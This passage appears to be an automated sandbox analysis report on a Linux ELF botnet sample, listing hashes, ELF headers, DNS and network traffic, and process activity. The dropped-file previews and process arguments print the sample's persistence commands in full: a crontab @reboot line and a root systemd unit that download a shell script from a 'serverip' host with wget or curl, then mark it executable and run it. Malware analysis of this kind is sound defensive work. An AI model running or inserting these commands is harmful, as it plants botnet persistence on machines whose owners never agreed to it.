                                https://link.edgepilot.com/s/58d339fb/mi_L0_elk0K48SZfFk6Q5A?u=http://www.ambassadorlimo.com/Get hashmaliciousUnknownBrowse
                                • 198.99.138.98
                                http://www.philmauer.com/Get hashmaliciousUnknownBrowse
                                • 172.111.52.90
                                http://loveevamk.lifeGet hashmaliciousUnknownBrowse
                                • 172.111.38.73
                                ychqRZFkZi.exeGet hashmaliciousQuasarBrowse
                                • 209.182.234.69
                                ychqRZFkZi.exeGet hashmaliciousQuasarBrowse
                                • 209.182.234.69
                                CANONICAL-ASGB.i.elfGet hashmaliciousUnknownBrowse
                                • 91.189.91.42
                                kjsusa6.elfGet hashmaliciousUnknownBrowse
                                • 91.189.91.42
                                mmb6.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                • 91.189.91.42
                                mmb9.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                • 91.189.91.42
                                ub8ehJSePAfc9FYqZIT6.arc.elfGet hashmaliciousMiraiBrowse
                                • 91.189.91.42
                                mmb1.elfGet hashmaliciousMirai, OkiruBrowse
                                • 91.189.91.42
                                mmb3.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                • 91.189.91.42
                                mmb4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                • 91.189.91.42
                                sshd.elfGet hashmaliciousUnknownBrowse
                                • 91.189.91.42
                                mmb2.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                • 91.189.91.42
                                No context
                                No context
                                Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):76
                                Entropy (8bit):3.7627880354948586
                                Encrypted:false
                                SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                Process:/tmp/i686.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):178
                                Entropy (8bit):4.358630015292201
                                Encrypted:false
                                SSDEEP:3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
                                MD5:C3685F292213652676F734AB36C060EE
                                SHA1:1D05F7F6302EC60E7990DE4BBE9180C149EFC731
                                SHA-256:D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C
                                SHA-512:7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295
                                Malicious:true
                                Reputation:moderate, very likely benign file
                                Preview:./bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".
                                Process:/tmp/i686.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):356
                                Entropy (8bit):4.9110117370593995
                                Encrypted:false
                                SSDEEP:6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
                                MD5:F03C70CD4C61A1852F9E19B8FB0D639C
                                SHA1:A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008
                                SHA-256:AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90
                                SHA-512:6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:[Unit].Description=My Miscellaneous Service.After=network.target..[Service].Type=simple.User=root.WorkingDirectory=/tmp.ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".Restart=no..[Install].WantedBy=multi-user.target.
                                Process:/usr/bin/crontab
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):235
                                Entropy (8bit):5.104158129595515
                                Encrypted:false
                                SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvamuZHGMQ5UYLtCFt3HY8jsHB:8QjHig8mmqeHLUHY8mB
                                MD5:D44BADE6FD643ECE44BA05AA097B89D6
                                SHA1:A431A237D6C77798FE8E433FA691E6B4DFAE5020
                                SHA-256:34DF6E7AD21D72F9F78A822D3A8F1AC2027A873CFEE6B94588FE246EA0C5E6CD
                                SHA-512:8C6940C8EC55B4D7E9B2A5C3FAD2D26D712EE8D712DF00D18E674FCB3B819B599BF1101D36A66FEFAB98E9C88B4F8C7FDC1267E92306980A12859E00D217C5E1
                                Malicious:true
                                Reputation:low
                                Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Nov 19 17:57:09 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot /bin/bash -c /bin/wget http://serverip/bins/bins.sh.
                                File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                Entropy (8bit):6.402441515864084
                                TrID:
                                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                File name:i686.elf
                                File size:70'372 bytes
                                MD5:ec6e587f931b314683abe573d5d9bc2a
                                SHA1:dd2a580e000eb5662b4fb4df5918e9779673bb90
                                SHA256:e1b71400f50e1e8a099dc9311c317c57e42e2310d1e0002353d115c736b2b0a7
                                SHA512:7136f3df2e70715ce57929d48ca1a96454855bf775d47073e2dc920a1a88807415306549d5aeb3278bd1e54f9c6ac47f0a25dae51c919733c8b638ee40b7335e
                                SSDEEP:1536:zt+6I5jIykn/IUG+BHOQUhjNjDnc4SOs9WLCm0gSDzutUI:8BIykgUG+NOnnfzDt+m0gSPm3
                                TLSH:B463F781BA07CAF6D41754B041E7BA3F8E31FD2A0872869DEF25FEA5CB235C16215358
                                File Content Preview:.ELF....................h...4...........4. ...(.....................D...D................................i..........Q.td............................U..S.......w....h........[]...$.............U......=.....t..1....$......$.......u........t...$@~...........

                                ELF header

                                Class:ELF32
                                Data:2's complement, little endian
                                Version:1 (current)
                                Machine:Intel 80386
                                Version Number:0x1
                                Type:EXEC (Executable file)
                                OS/ABI:UNIX - System V
                                ABI Version:0
                                Entry Point Address:0x8048168
                                Flags:0x0
                                ELF Header Size:52
                                Program Header Offset:52
                                Program Header Size:32
                                Number of Program Headers:3
                                Section Header Offset:69812
                                Section Header Size:40
                                Number of Section Headers:14
                                Header String Table Index:13
                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                NULL0x00x00x00x00x0000
                                .initPROGBITS0x80480940x940x1c0x00x6AX001
                                .textPROGBITS0x80480b00xb00xe4010x00x6AX0016
                                .finiPROGBITS0x80564b10xe4b10x170x00x6AX001
                                .rodataPROGBITS0x80564e00xe4e00x195f0x00x2A0032
                                .eh_framePROGBITS0x8057e400xfe400x40x00x2A004
                                .ctorsPROGBITS0x80580000x100000x80x00x3WA004
                                .dtorsPROGBITS0x80580080x100080x80x00x3WA004
                                .jcrPROGBITS0x80580100x100100x40x00x3WA004
                                .got.pltPROGBITS0x80580140x100140xc0x40x3WA004
                                .dataPROGBITS0x80580200x100200x2a00x00x3WA0032
                                .bssNOBITS0x80582c00x102c00x67000x00x3WA0032
                                .commentPROGBITS0x00x102c00xd920x00x0001
                                .shstrtabSTRTAB0x00x110520x5f0x00x0001
                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                LOAD0x00x80480000x80480000xfe440xfe446.41860x5R E0x1000.init .text .fini .rodata .eh_frame
                                LOAD0x100000x80580000x80580000x2c00x69c03.82090x6RW 0x1000.ctors .dtors .jcr .got.plt .data .bss
                                GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 20, 2024 00:57:04.101002932 CET4515053192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:08.196857929 CET4515053192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:14.596705914 CET46540443192.168.2.14185.125.190.26
                                Nov 20, 2024 00:57:16.578207016 CET4515453192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:17.604470968 CET4515453192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:19.620385885 CET4515453192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:23.812220097 CET4515453192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:42.577183962 CET4515653192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:43.587552071 CET4515653192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:44.547434092 CET46540443192.168.2.14185.125.190.26
                                Nov 20, 2024 00:57:45.603368998 CET4515653192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:49.667227983 CET4515653192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:58.076742887 CET4515853192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:59.106848001 CET4515853192.168.2.148.8.8.8
                                Nov 20, 2024 00:58:01.122777939 CET4515853192.168.2.148.8.8.8
                                Nov 20, 2024 00:58:05.282610893 CET4515853192.168.2.148.8.8.8
                                Nov 20, 2024 00:58:13.576059103 CET4516053192.168.2.148.8.8.8
                                Nov 20, 2024 00:58:14.594258070 CET4516053192.168.2.148.8.8.8
                                Nov 20, 2024 00:58:16.610263109 CET4516053192.168.2.148.8.8.8
                                Nov 20, 2024 00:58:20.642137051 CET4516053192.168.2.148.8.8.8
                                Nov 20, 2024 00:59:00.015141010 CET400121290192.168.2.14172.111.38.48
                                Nov 20, 2024 00:59:00.020584106 CET129040012172.111.38.48192.168.2.14
                                Nov 20, 2024 00:59:00.020982027 CET400121290192.168.2.14172.111.38.48
                                Nov 20, 2024 00:59:00.021038055 CET400121290192.168.2.14172.111.38.48
                                Nov 20, 2024 00:59:00.026232958 CET129040012172.111.38.48192.168.2.14
                                Nov 20, 2024 00:59:00.489540100 CET129040012172.111.38.48192.168.2.14
                                Nov 20, 2024 00:59:00.490072966 CET400121290192.168.2.14172.111.38.48
                                Nov 20, 2024 00:59:05.490263939 CET129040012172.111.38.48192.168.2.14
                                Nov 20, 2024 00:59:05.490422010 CET400121290192.168.2.14172.111.38.48
                                Nov 20, 2024 00:59:05.490614891 CET400121290192.168.2.14172.111.38.48
                                Nov 20, 2024 00:59:05.496099949 CET129040012172.111.38.48192.168.2.14
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 20, 2024 00:57:09.942131996 CET6021753192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:11.328425884 CET3288153192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:14.656331062 CET5552753192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:14.656399012 CET5613453192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:14.944710970 CET5175653192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:19.660548925 CET5613453192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:19.948400021 CET5941253192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:24.828072071 CET5613453192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:24.952258110 CET4061053192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:26.827796936 CET3734053192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:29.956013918 CET4586753192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:30.077620029 CET5613453192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:32.077528000 CET3734053192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:35.327419996 CET5613453192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:37.327415943 CET3734053192.168.2.148.8.8.8
                                Nov 20, 2024 00:57:40.577192068 CET5613453192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:45.827086926 CET5613453192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:52.826755047 CET5782053192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:54.960350990 CET5847153192.168.2.141.1.1.1
                                Nov 20, 2024 00:57:59.965372086 CET4304653192.168.2.141.1.1.1
                                Nov 20, 2024 00:58:04.970401049 CET3583053192.168.2.141.1.1.1
                                Nov 20, 2024 00:58:08.326240063 CET3889453192.168.2.141.1.1.1
                                Nov 20, 2024 00:58:09.975533009 CET5015653192.168.2.141.1.1.1
                                Nov 20, 2024 00:58:14.980410099 CET5317053192.168.2.141.1.1.1
                                Nov 20, 2024 00:58:23.825552940 CET5001453192.168.2.141.1.1.1
                                Nov 20, 2024 00:58:29.075628042 CET5159153192.168.2.148.8.8.8
                                Nov 20, 2024 00:58:39.982966900 CET5912353192.168.2.141.1.1.1
                                Nov 20, 2024 00:58:44.988172054 CET5310253192.168.2.141.1.1.1
                                Nov 20, 2024 00:58:49.992943048 CET4891753192.168.2.141.1.1.1
                                Nov 20, 2024 00:58:54.997931004 CET3998453192.168.2.141.1.1.1
                                Nov 20, 2024 00:59:00.000642061 CET5912653192.168.2.141.1.1.1
                                Nov 20, 2024 00:59:00.014889002 CET53591261.1.1.1192.168.2.14
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Nov 20, 2024 00:57:09.942131996 CET192.168.2.141.1.1.10xc6b3Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:57:11.328425884 CET192.168.2.141.1.1.10xb9ecStandard query (0)motd.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:57:14.656331062 CET192.168.2.141.1.1.10x2348Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:57:14.656399012 CET192.168.2.141.1.1.10xb86aStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:57:14.944710970 CET192.168.2.141.1.1.10xc6b3Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:57:19.660548925 CET192.168.2.141.1.1.10xb86aStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:57:19.948400021 CET192.168.2.141.1.1.10xc6b3Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:57:24.828072071 CET192.168.2.141.1.1.10xb86aStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:57:24.952258110 CET192.168.2.141.1.1.10xc6b3Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:57:26.827796936 CET192.168.2.148.8.8.80xb9ecStandard query (0)motd.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:57:29.956013918 CET192.168.2.141.1.1.10xc6b3Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:57:30.077620029 CET192.168.2.141.1.1.10xb86aStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:57:32.077528000 CET192.168.2.148.8.8.80xb9ecStandard query (0)motd.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:57:35.327419996 CET192.168.2.141.1.1.10xb86aStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:57:37.327415943 CET192.168.2.148.8.8.80xb9ecStandard query (0)motd.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:57:40.577192068 CET192.168.2.141.1.1.10xb86aStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:57:45.827086926 CET192.168.2.141.1.1.10xb86aStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:57:52.826755047 CET192.168.2.141.1.1.10xb9ecStandard query (0)motd.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:57:54.960350990 CET192.168.2.141.1.1.10x93c3Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:57:59.965372086 CET192.168.2.141.1.1.10x93c3Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:58:04.970401049 CET192.168.2.141.1.1.10x93c3Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:58:08.326240063 CET192.168.2.141.1.1.10xb9ecStandard query (0)motd.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:58:09.975533009 CET192.168.2.141.1.1.10x93c3Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:58:14.980410099 CET192.168.2.141.1.1.10x93c3Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:58:23.825552940 CET192.168.2.141.1.1.10xb9ecStandard query (0)motd.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:58:29.075628042 CET192.168.2.148.8.8.80xb9ecStandard query (0)motd.ubuntu.com28IN (0x0001)false
                                Nov 20, 2024 00:58:39.982966900 CET192.168.2.141.1.1.10x9c3eStandard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:58:44.988172054 CET192.168.2.141.1.1.10x9c3eStandard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:58:49.992943048 CET192.168.2.141.1.1.10x9c3eStandard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:58:54.997931004 CET192.168.2.141.1.1.10x9c3eStandard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                Nov 20, 2024 00:59:00.000642061 CET192.168.2.141.1.1.10x9c3eStandard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Nov 20, 2024 00:59:00.014889002 CET1.1.1.1192.168.2.140x9c3eNo error (0)host.zopz-api.com172.111.38.48A (IP address)IN (0x0001)false

                                System Behavior

                                Start time (UTC):23:57:05
                                Start date (UTC):19/11/2024
                                Path:/tmp/i686.elf
                                Arguments:/tmp/i686.elf
                                File size:70372 bytes
                                MD5 hash:ec6e587f931b314683abe573d5d9bc2a

                                Start time (UTC):23:57:05
                                Start date (UTC):19/11/2024
                                Path:/tmp/i686.elf
                                Arguments:-
                                File size:70372 bytes
                                MD5 hash:ec6e587f931b314683abe573d5d9bc2a

                                Start time (UTC):23:57:05
                                Start date (UTC):19/11/2024
                                Path:/tmp/i686.elf
                                Arguments:-
                                File size:70372 bytes
                                MD5 hash:ec6e587f931b314683abe573d5d9bc2a

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/tmp/i686.elf
                                Arguments:-
                                File size:70372 bytes
                                MD5 hash:ec6e587f931b314683abe573d5d9bc2a

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/tmp/i686.elf
                                Arguments:-
                                File size:70372 bytes
                                MD5 hash:ec6e587f931b314683abe573d5d9bc2a

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/tmp/i686.elf
                                Arguments:-
                                File size:70372 bytes
                                MD5 hash:ec6e587f931b314683abe573d5d9bc2a

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/bin/sh
                                Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/usr/bin/crontab
                                Arguments:crontab -l
                                File size:43720 bytes
                                MD5 hash:66e521d421ac9b407699061bf21806f5

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/usr/bin/chmod
                                Arguments:chmod +x bins.sh
                                File size:63864 bytes
                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/usr/bin/sh
                                Arguments:sh bins.sh
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/bin/curl
                                Arguments:/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
                                File size:239848 bytes
                                MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                                Start time (UTC):23:57:11
                                Start date (UTC):19/11/2024
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):23:57:11
                                Start date (UTC):19/11/2024
                                Path:/usr/bin/chmod
                                Arguments:chmod +x bins.sh
                                File size:63864 bytes
                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                Start time (UTC):23:57:11
                                Start date (UTC):19/11/2024
                                Path:/usr/bin/sh
                                Arguments:sh bins.sh
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):23:57:09
                                Start date (UTC):19/11/2024
                                Path:/usr/bin/crontab
                                Arguments:crontab -
                                File size:43720 bytes
                                MD5 hash:66e521d421ac9b407699061bf21806f5

                                Start time (UTC):23:57:11
                                Start date (UTC):19/11/2024
                                Path:/tmp/i686.elf
                                Arguments:-
                                File size:70372 bytes
                                MD5 hash:ec6e587f931b314683abe573d5d9bc2a

                                Start time (UTC):23:57:11
                                Start date (UTC):19/11/2024
                                Path:/bin/sh
                                Arguments:sh -c "/bin/systemctl enable bot"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):23:57:11
                                Start date (UTC):19/11/2024
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):23:57:11
                                Start date (UTC):19/11/2024
                                Path:/bin/systemctl
                                Arguments:/bin/systemctl enable bot
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                Start time (UTC):23:57:12
                                Start date (UTC):19/11/2024
                                Path:/usr/lib/systemd/systemd
                                Arguments:-
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                Start time (UTC):23:57:12
                                Start date (UTC):19/11/2024
                                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                File size:22760 bytes
                                MD5 hash:3633b075f40283ec938a2a6a89671b0e